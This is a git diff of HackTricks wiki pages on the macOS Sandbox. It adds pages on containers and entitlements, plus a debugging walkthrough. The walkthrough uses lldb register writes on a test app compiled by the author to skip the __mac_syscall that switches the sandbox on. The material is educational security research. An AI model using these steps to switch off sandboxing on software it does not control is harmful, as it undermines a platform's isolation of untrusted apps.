GITBOOK-3944: change request with no subject merged in GitBook
BIN
.gitbook/assets/image (2) (6) (3).png
Normal file
After Width: | Height: | Size: 44 KiB |
Before Width: | Height: | Size: 44 KiB After Width: | Height: | Size: 12 KiB |
Before Width: | Height: | Size: 12 KiB After Width: | Height: | Size: 436 KiB |
Before Width: | Height: | Size: 436 KiB After Width: | Height: | Size: 172 KiB |
|
@ -154,6 +154,8 @@
|
||||||
* [macOS Network Protocols](macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md)
|
* [macOS Network Protocols](macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md)
|
||||||
* [macOS Red Teaming](macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md)
|
* [macOS Red Teaming](macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md)
|
||||||
* [macOS Serial Number](macos-hardening/macos-security-and-privilege-escalation/macos-serial-number.md)
|
* [macOS Serial Number](macos-hardening/macos-security-and-privilege-escalation/macos-serial-number.md)
|
||||||
|
* [macOS Sandbox](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/README.md)
|
||||||
|
* [macOS Sandbox Debug & Bypass](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/macos-sandbox-debug-and-bypass.md)
|
||||||
* [macOS Apps - Inspecting, debugging and Fuzzing](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md)
|
* [macOS Apps - Inspecting, debugging and Fuzzing](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md)
|
||||||
* [Introduction to ARM64](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
* [Introduction to ARM64](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
# Cgroups
|
# CGroups
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -7,7 +7,7 @@
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -89,7 +89,7 @@ An exception to these rules is the **root cgroup** found at the bottom of the hi
|
||||||
|
|
||||||
Even with no controllers enabled, you can see the CPU usage of a cgroup by looking at its cpu.stat file:
|
Even with no controllers enabled, you can see the CPU usage of a cgroup by looking at its cpu.stat file:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (2) (6).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (2) (6) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Because this is the accumulated CPU usage over the entire lifespan of the cgroup, you can see how a service consumes processor time even if it spawns many subprocesses that eventually terminate.
|
Because this is the accumulated CPU usage over the entire lifespan of the cgroup, you can see how a service consumes processor time even if it spawns many subprocesses that eventually terminate.
|
||||||
|
|
||||||
|
@ -100,7 +100,7 @@ Because this is the accumulated CPU usage over the entire lifespan of the cgroup
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -382,11 +382,100 @@ Here you can find examples of how some **malwares have been able to bypass this
|
||||||
|
|
||||||
* [https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/)
|
* [https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/)
|
||||||
|
|
||||||
### Seatbelt Sandbox
|
### Sandbox
|
||||||
|
|
||||||
MacOS Sandbox works with the kernel extension Seatbelt. It makes applications run inside the sandbox **need to request access to resources outside of the limited sandbox**. This helps to ensure that **the application will be accessing only expected resources** and if it wants to access anything else it will need to ask for permissions to the user.
|
MacOS Sandbox (initially called Seatbelt) makes applications run inside the sandbox **need to request access to resources outside of the limited sandbox**. This helps to ensure that **the application will be accessing only expected resources** and if it wants to access anything else it will need to ask for permissions to the user.
|
||||||
|
|
||||||
Important **system services** also run inside their own custom **sandbox** such as the mdnsresponder service. You can view these custom **sandbox profiles** inside the **`/usr/share/sandbox`** directory. Other sandbox profiles can be checked in [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
|
Any app with the **entitlement** `com.apple.security.app-sandbox` will be executed inside the sandbox. In order to publish inside the App Store, **this entitlement is mandatory**. So most applications will be executed inside the sandbox.
|
||||||
|
|
||||||
|
Some important components of the Sandbox are:
|
||||||
|
|
||||||
|
* The **kernel extension** `/System/Library/Extensions/Sandbox.kext`
|
||||||
|
* The **private framework** `/System/Library/PrivateFrameworks/AppSandbox.framework`
|
||||||
|
* A **daemon** running in userland `/usr/libexec/sandboxd`
|
||||||
|
* The **containers** `~/Library/Containers`
|
||||||
|
|
||||||
|
Inside the containers folder you can find **a folder for each app executed sanboxed** with the name of the bundle id:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -l ~/Library/Containers
|
||||||
|
total 0
|
||||||
|
drwx------@ 4 username staff 128 May 23 20:20 com.apple.AMPArtworkAgent
|
||||||
|
drwx------@ 4 username staff 128 May 23 20:13 com.apple.AMPDeviceDiscoveryAgent
|
||||||
|
drwx------@ 4 username staff 128 Mar 24 18:03 com.apple.AVConference.Diagnostic
|
||||||
|
drwx------@ 4 username staff 128 Mar 25 14:14 com.apple.Accessibility-Settings.extension
|
||||||
|
drwx------@ 4 username staff 128 Mar 25 14:10 com.apple.ActionKit.BundledIntentHandler
|
||||||
|
[...]
|
||||||
|
```
|
||||||
|
|
||||||
|
Inside each bundle id folder you can find the **plist** and the **Data directory** of the App:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cd /Users/username/Library/Containers/com.apple.Safari
|
||||||
|
ls -la
|
||||||
|
total 104
|
||||||
|
drwx------@ 4 username staff 128 Mar 24 18:08 .
|
||||||
|
drwx------ 348 username staff 11136 May 23 20:57 ..
|
||||||
|
-rw-r--r-- 1 username staff 50214 Mar 24 18:08 .com.apple.containermanagerd.metadata.plist
|
||||||
|
drwx------ 13 username staff 416 Mar 24 18:05 Data
|
||||||
|
|
||||||
|
ls -l Data
|
||||||
|
total 0
|
||||||
|
drwxr-xr-x@ 8 username staff 256 Mar 24 18:08 CloudKit
|
||||||
|
lrwxr-xr-x 1 username staff 19 Mar 24 18:02 Desktop -> ../../../../Desktop
|
||||||
|
drwx------ 2 username staff 64 Mar 24 18:02 Documents
|
||||||
|
lrwxr-xr-x 1 username staff 21 Mar 24 18:02 Downloads -> ../../../../Downloads
|
||||||
|
drwx------ 35 username staff 1120 Mar 24 18:08 Library
|
||||||
|
lrwxr-xr-x 1 username staff 18 Mar 24 18:02 Movies -> ../../../../Movies
|
||||||
|
lrwxr-xr-x 1 username staff 17 Mar 24 18:02 Music -> ../../../../Music
|
||||||
|
lrwxr-xr-x 1 username staff 20 Mar 24 18:02 Pictures -> ../../../../Pictures
|
||||||
|
drwx------ 2 username staff 64 Mar 24 18:02 SystemData
|
||||||
|
drwx------ 2 username staff 64 Mar 24 18:02 tmp
|
||||||
|
```
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
Note that even if the symlinks are there to "escape" from the Sandbox and access other folders, the App still needs to **have permissions** to access them. These permissions are inside the **`.plist`**.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Get permissions
|
||||||
|
plutil -convert xml1 .com.apple.containermanagerd.metadata.plist -o -
|
||||||
|
|
||||||
|
# In this file you can find the entitlements:
|
||||||
|
<key>Entitlements</key>
|
||||||
|
<dict>
|
||||||
|
<key>com.apple.MobileAsset.PhishingImageClassifier2</key>
|
||||||
|
<true/>
|
||||||
|
<key>com.apple.accounts.appleaccount.fullaccess</key>
|
||||||
|
<true/>
|
||||||
|
<key>com.apple.appattest.spi</key>
|
||||||
|
<true/>
|
||||||
|
[...]
|
||||||
|
|
||||||
|
# Some parameters
|
||||||
|
<key>Parameters</key>
|
||||||
|
<dict>
|
||||||
|
<key>_HOME</key>
|
||||||
|
<string>/Users/username</string>
|
||||||
|
<key>_UID</key>
|
||||||
|
<string>501</string>
|
||||||
|
<key>_USER</key>
|
||||||
|
<string>username</string>
|
||||||
|
[...]
|
||||||
|
|
||||||
|
# The paths it can access
|
||||||
|
<key>RedirectablePaths</key>
|
||||||
|
<array>
|
||||||
|
<string>/Users/username/Downloads</string>
|
||||||
|
<string>/Users/username/Documents</string>
|
||||||
|
<string>/Users/username/Library/Calendars</string>
|
||||||
|
<string>/Users/username/Desktop</string>
|
||||||
|
[...]
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Important **system services** also run inside their own custom **sandbox** such as the mdnsresponder service. You can view these custom **sandbox profiles** written in a language called Sandbox Profile Language (SBPL) inside the **`/usr/share/sandbox`** directory. Other sandbox profiles can be checked in [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
|
||||||
|
|
||||||
To start an application with a sandbox config you can use:
|
To start an application with a sandbox config you can use:
|
||||||
|
|
||||||
|
|
|
@ -176,7 +176,7 @@ In the header first you find the **segment header**:
|
||||||
|
|
||||||
Example of segment header:
|
Example of segment header:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
This header defines the **number of sections whose headers appear after** it:
|
This header defines the **number of sections whose headers appear after** it:
|
||||||
|
|
||||||
|
|
|
@ -132,7 +132,7 @@ In the left panel of hopper it's possible to see the symbols (**Labels**) of the
|
||||||
|
|
||||||
In the middle panel you can see the **dissasembled code**. And you can see it a **raw** disassemble, as **graph**, as **decompiled** and as **binary** by clicking on the respective icon:
|
In the middle panel you can see the **dissasembled code**. And you can see it a **raw** disassemble, as **graph**, as **decompiled** and as **binary** by clicking on the respective icon:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (2) (6).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Right clicking in a code object you can see **references to/from that object** or even change its name (this doesn't work in decompiled pseudocode):
|
Right clicking in a code object you can see **references to/from that object** or even change its name (this doesn't work in decompiled pseudocode):
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,41 @@
|
||||||
|
# macOS Sandbox
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Basic Information
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
### Start Sandbox
|
||||||
|
|
||||||
|
**Processes are not born sandboxed on macOS: unlike iOS**, where the sandbox is applied by the kernel before the first instruction of a program executes, on macOS **a process must elect to place itself into the sandbox.**
|
||||||
|
|
||||||
|
Processes are automatically Sandboxed from userland when they start if they have the entitlement: `com.apple.security.app-sandbox`. For a detailed explanation of this process check:
|
||||||
|
|
||||||
|
{% content-ref url="macos-sandbox-debug-and-bypass.md" %}
|
||||||
|
[macos-sandbox-debug-and-bypass.md](macos-sandbox-debug-and-bypass.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
|
@ -0,0 +1,284 @@
|
||||||
|
# macOS Sandbox Debug & Bypass
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Sandbox loading process
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption><p>Image from <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
|
||||||
|
|
||||||
|
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
|
||||||
|
|
||||||
|
The compiler will link `/usr/lib/libSystem.B.dylib` to the binary.
|
||||||
|
|
||||||
|
Then, **`libSystem.B`** will be calling other several functions until the **`xpc_pipe_routine`** sends the entitlements of the app to **`securityd`**. Securityd checks if the process should be quarantine inside the Sandbox, and if so, it will be quarentine.\
|
||||||
|
Finally, the sandbox will be activated will a call to **`__sandbox_ms`** which will call **`__mac_syscall`**.
|
||||||
|
|
||||||
|
### Sanbox load debug & bypass
|
||||||
|
|
||||||
|
Let's compile an application that should be sandboxed:
|
||||||
|
|
||||||
|
{% tabs %}
|
||||||
|
{% tab title="sand.c" %}
|
||||||
|
```c
|
||||||
|
#include <stdlib.h>
|
||||||
|
int main() {
|
||||||
|
system("cat ~/Desktop/del.txt");
|
||||||
|
}
|
||||||
|
```
|
||||||
|
{% endtab %}
|
||||||
|
|
||||||
|
{% tab title="entitlements.xml" %}
|
||||||
|
```xml
|
||||||
|
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
|
||||||
|
<dict>
|
||||||
|
<key>com.apple.security.app-sandbox</key>
|
||||||
|
<true/>
|
||||||
|
</dict>
|
||||||
|
</plist>
|
||||||
|
```
|
||||||
|
{% endtab %}
|
||||||
|
|
||||||
|
{% tab title="Info.plist" %}
|
||||||
|
```xml
|
||||||
|
<plist version="1.0">
|
||||||
|
<dict>
|
||||||
|
<key>CFBundleIdentifier</key>
|
||||||
|
<string>xyz.hacktricks.sandbox</string>
|
||||||
|
<key>CFBundleName</key>
|
||||||
|
<string>Sandbox</string>
|
||||||
|
</dict>
|
||||||
|
</plist>
|
||||||
|
```
|
||||||
|
{% endtab %}
|
||||||
|
{% endtabs %}
|
||||||
|
|
||||||
|
Then compile the app:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
# Compile it
|
||||||
|
gcc -Xlinker -sectcreate -Xlinker __TEXT -Xlinker __info_plist -Xlinker Info.plist sand.c -o sand
|
||||||
|
|
||||||
|
# Create a certificate for "Code Signing"
|
||||||
|
|
||||||
|
# Apply the entitlements via signing
|
||||||
|
codesign -s <cert-name> --entitlements entitlements.xml sand
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
The app will try to **read** the file **`~/Desktop/del.txt`**, which the **Sandbox won't allow**.\
|
||||||
|
Create a file in there as once the Sandbox is bypassed, it will be able to read it:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo "Sandbox Bypassed" > ~/Desktop/del.txt
|
||||||
|
```
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
Let's debug the chess application to see when is the Sandbox loaded:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Load app in debugging
|
||||||
|
lldb ./sand
|
||||||
|
|
||||||
|
# Set breakpoint in xpc_pipe_routine
|
||||||
|
(lldb) b xpc_pipe_routine
|
||||||
|
|
||||||
|
# run
|
||||||
|
(lldb) r
|
||||||
|
|
||||||
|
# This breakpoint is reached by different functionalities
|
||||||
|
# Check in the backtrace is it was de sandbox one the one that reached it
|
||||||
|
# We are looking for the one libsecinit from libSystem.B, like the following one:
|
||||||
|
(lldb) bt
|
||||||
|
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
|
||||||
|
* frame #0: 0x00000001873d4178 libxpc.dylib`xpc_pipe_routine
|
||||||
|
frame #1: 0x000000019300cf80 libsystem_secinit.dylib`_libsecinit_appsandbox + 584
|
||||||
|
frame #2: 0x00000001874199c4 libsystem_trace.dylib`_os_activity_initiate_impl + 64
|
||||||
|
frame #3: 0x000000019300cce4 libsystem_secinit.dylib`_libsecinit_initializer + 80
|
||||||
|
frame #4: 0x0000000193023694 libSystem.B.dylib`libSystem_initializer + 272
|
||||||
|
|
||||||
|
# To avoid lldb cutting info
|
||||||
|
(lldb) settings set target.max-string-summary-length 10000
|
||||||
|
|
||||||
|
# The message is in the 2 arg of the xpc_pipe_routine function, get it with:
|
||||||
|
(lldb) p (char *) xpc_copy_description($x1)
|
||||||
|
(char *) $0 = 0x000000010100a400 "<dictionary: 0x6000026001e0> { count = 5, transaction: 0, voucher = 0x0, contents =\n\t\"SECINITD_REGISTRATION_MESSAGE_SHORT_NAME_KEY\" => <string: 0x600000c00d80> { length = 4, contents = \"sand\" }\n\t\"SECINITD_REGISTRATION_MESSAGE_IMAGE_PATHS_ARRAY_KEY\" => <array: 0x600000c00120> { count = 42, capacity = 64, contents =\n\t\t0: <string: 0x600000c000c0> { length = 14, contents = \"/tmp/lala/sand\" }\n\t\t1: <string: 0x600000c001e0> { length = 22, contents = \"/private/tmp/lala/sand\" }\n\t\t2: <string: 0x600000c000f0> { length = 26, contents = \"/usr/lib/libSystem.B.dylib\" }\n\t\t3: <string: 0x600000c00180> { length = 30, contents = \"/usr/lib/system/libcache.dylib\" }\n\t\t4: <string: 0x600000c00060> { length = 37, contents = \"/usr/lib/system/libcommonCrypto.dylib\" }\n\t\t5: <string: 0x600000c001b0> { length = 36, contents = \"/usr/lib/system/libcompiler_rt.dylib\" }\n\t\t6: <string: 0x600000c00330> { length = 33, contents = \"/usr/lib/system/libcopyfile.dylib\" }\n\t\t7: <string: 0x600000c00210> { length = 35, contents = \"/usr/lib/system/libcorecry"...
|
||||||
|
|
||||||
|
# The 3 arg is the address were the XPC response will be stored
|
||||||
|
(lldb) register read x2
|
||||||
|
x2 = 0x000000016fdfd660
|
||||||
|
|
||||||
|
# Move until the end of the function
|
||||||
|
(lldb) finish
|
||||||
|
|
||||||
|
# Read the response
|
||||||
|
## Check the address of the sandbox container in SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY
|
||||||
|
(lldb) memory read -f p 0x000000016fdfd660 -c 1
|
||||||
|
0x16fdfd660: 0x0000600003d04000
|
||||||
|
(lldb) p (char *) xpc_copy_description(0x0000600003d04000)
|
||||||
|
(char *) $4 = 0x0000000100204280 "<dictionary: 0x600003d04000> { count = 7, transaction: 0, voucher = 0x0, contents =\n\t\"SECINITD_REPLY_MESSAGE_CONTAINER_ID_KEY\" => <string: 0x600000c04d50> { length = 22, contents = \"xyz.hacktricks.sandbox\" }\n\t\"SECINITD_REPLY_MESSAGE_QTN_PROC_FLAGS_KEY\" => <uint64: 0xaabe660cef067137>: 2\n\t\"SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY\" => <string: 0x600000c04e10> { length = 65, contents = \"/Users/carlospolop/Library/Containers/xyz.hacktricks.sandbox/Data\" }\n\t\"SECINITD_REPLY_MESSAGE_SANDBOX_PROFILE_DATA_KEY\" => <data: 0x600001704100>: { length = 19027 bytes, contents = 0x0000f000ba0100000000070000001e00350167034d03c203... }\n\t\"SECINITD_REPLY_MESSAGE_VERSION_NUMBER_KEY\" => <int64: 0xaa3e660cef06712f>: 1\n\t\"SECINITD_MESSAGE_TYPE_KEY\" => <uint64: 0xaabe660cef067137>: 2\n\t\"SECINITD_REPLY_FAILURE_CODE\" => <uint64: 0xaabe660cef067127>: 0\n}"
|
||||||
|
|
||||||
|
# To bypass the sandbox we need to skip the call to __mac_syscall
|
||||||
|
# Lets put a breakpoint in __mac_syscall when x1 is 0 (this is the code to enable the sandbox)
|
||||||
|
(lldb) breakpoint set --name __mac_syscall --condition '($x1 == 0)'
|
||||||
|
(lldb) c
|
||||||
|
|
||||||
|
# The 1 arg is the name of the policy, in this case "Sandbox"
|
||||||
|
(lldb) memory read -f s $x0
|
||||||
|
0x19300eb22: "Sandbox"
|
||||||
|
|
||||||
|
#
|
||||||
|
# BYPASS
|
||||||
|
#
|
||||||
|
|
||||||
|
# Due to the previous bp, the process will be stopped in:
|
||||||
|
Process 2517 stopped
|
||||||
|
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
|
||||||
|
frame #0: 0x0000000187659900 libsystem_kernel.dylib`__mac_syscall
|
||||||
|
libsystem_kernel.dylib`:
|
||||||
|
-> 0x187659900 <+0>: mov x16, #0x17d
|
||||||
|
0x187659904 <+4>: svc #0x80
|
||||||
|
0x187659908 <+8>: b.lo 0x187659928 ; <+40>
|
||||||
|
0x18765990c <+12>: pacibsp
|
||||||
|
|
||||||
|
# To bypass jump to the b.lo address modifying some registers first
|
||||||
|
(lldb) breakpoint delete 1 # Remove bp
|
||||||
|
(lldb) register write $pc 0x187659928 #b.lo address
|
||||||
|
(lldb) register write $x0 0x00
|
||||||
|
(lldb) register write $x1 0x00
|
||||||
|
(lldb) register write $x16 0x17d
|
||||||
|
(lldb) c
|
||||||
|
Process 2517 resuming
|
||||||
|
Sandbox Bypassed!
|
||||||
|
Process 2517 exited with status = 0 (0x00000000)
|
||||||
|
```
|
||||||
|
|
||||||
|
{% hint style="warning" %}
|
||||||
|
